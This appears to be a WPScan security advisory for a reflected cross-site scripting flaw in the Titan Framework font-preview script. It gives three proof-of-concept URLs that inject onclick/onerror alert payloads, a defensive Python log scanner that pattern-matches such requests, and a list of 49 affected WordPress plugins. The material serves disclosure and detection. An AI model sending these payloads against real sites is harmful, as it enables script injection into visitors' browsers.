
Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)

Description

The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.

Edit (WPScanTeam):

- The original report mentioned the issue in the awesome-support plugin 6.0.1; however, we scanned the WordPress plugins repository for uses of this library and found 49 affected plugins.
- The titan-framework has been permanently closed as no longer updated and maintained.
- The full report, including all the affected plugins, was shared with the WP plugins team on March 28th, 2021, and they gave vendors 3 months to find a replacement.

### PoC

Original reporter:

    /wp-content/plugins/awesome-support/vendor/gambitph/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family;=aaaaa&font-weight;=%27%20accesskey=%27x%27%20onclick=%27alert(1)%27%20class=%27

WPScanTeam:

    /lib/iframe-font-preview.php?font-type=google&font-family;=aaaaa&font-weight;=%27%20onerror=alert(/XSS/)%20b=%27
    /lib/iframe-font-preview.php?font-type=google&font-family;=%27/onerror=%27alert(/XSS/)%27/b=%27
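As an added defender-side example (not code from this advisory or from titan-framework), the following Python scans web-server access-log lines for requests to iframe-font-preview.php whose font-family or font-weight values carry attribute break-out characters, which is the shape of the PoC requests above. The log lines, client addresses and response codes are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format, trimmed); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2021:10:01:02 +0000] "GET /wp-content/plugins/awesome-support/vendor/gambitph/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(/XSS/)%20b=%27 HTTP/1.1" 200 512
203.0.113.5 - - [28/Mar/2021:10:01:05 +0000] "GET /wp-content/plugins/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=Roboto&font-weight=400 HTTP/1.1" 200 512
198.51.100.7 - - [28/Mar/2021:10:02:10 +0000] "GET /wp-content/plugins/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(/XSS/)%27/b=%27 HTTP/1.1" 404 231
"""

# Minimal parse of the request-line fields we need.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# The two parameters the advisory says are reflected unescaped into the href attribute.
TAINTED_PARAMS = ("font-family", "font-weight")
# Attribute break-out markers: a quote, an angle bracket, or an on* event-handler name.
MARKER_RE = re.compile(r"""['"<>]|\bon[a-z]+\s*=""", re.IGNORECASE)


def suspicious_requests(log_text):
    """Return one finding per tainted parameter whose decoded value carries a break-out marker."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/iframe-font-preview.php"):
            continue
        # parse_qs percent-decodes, so %27%20onerror=... becomes ' onerror=...
        qs = parse_qs(parts.query, keep_blank_values=True)
        for name in TAINTED_PARAMS:
            for value in qs.get(name, []):
                if MARKER_RE.search(value):
                    hits.append({
                        "ip": m.group("ip"),
                        "param": name,
                        "value": value,
                        # 200 means the preview script answered; 404 suggests it is already gone.
                        "status": int(m.group("status")),
                    })
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['param']}={hit['value']!r}")
```

A 200 on a flagged request only shows the preview script was still reachable (one of the 49 affected plugins is installed), not that the payload ran in a victim's browser.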


Affected Software


| Name | Version |
|------|---------|
| 4k-icon-fonts-for-visual-composer | * |
| adblock-notify-by-bweb | * |
| affiliate-pro | * |
| amp-extensions | * |
| aoi-tori | * |
| awesome-support | * |
| betteroptin | * |
| border-loading-bar | * |
| catchers-helpdesk | * |
| categories-gallery | * |
| categories-gallery-woocommerce | * |
| cf7-customizer | * |
| clinicalwp-core | * |
| cool-facebook-page-feed-timeline | * |
| custom-scroll-bar-designer | * |
| custom-text-selection-colors | * |
| disable-image-right-click | * |
| easy-gallery-slideshow | * |
| easy-google-map | * |
| easy-justified-gallery | * |
| email-my-posts | * |
| exit-popup-show | * |
| flight-search-widget-blocks | * |
| icons-with-links-widget | * |
| icustomizer | 1.5.0 |
| live-chat-facebook-fanpage | * |
| media-mirror | * |
| mobile-menu | 2.8.2.3 |
| popup-modal-for-youtube | * |
| project-app | * |
| seatgeek-affiliate-tickets | * |
| seo-dashboard-by-gutewebsites-de | * |
| share-woocommerce-email | * |
| simple-behace-portfolio | * |
| stars-menu | * |
| station-pro | 2.2.2 |
| sticky-related-posts | * |
| tcs3 | * |
| template-events-calendar | 1.7.2 |
| titan-framework | * |
| total-sales-for-woocommerce | * |
| tr-easy-google-analytics | * |
| venture-event-manager | 3.2.5 |
| w3s-cf7-zoho | 2.1.0 |
| webhotelier | * |
| woo-availability-date | * |
| woo-whatsapp-request-quote | * |
| woosaleskit-bar | * |
| yandex-money-button | * |
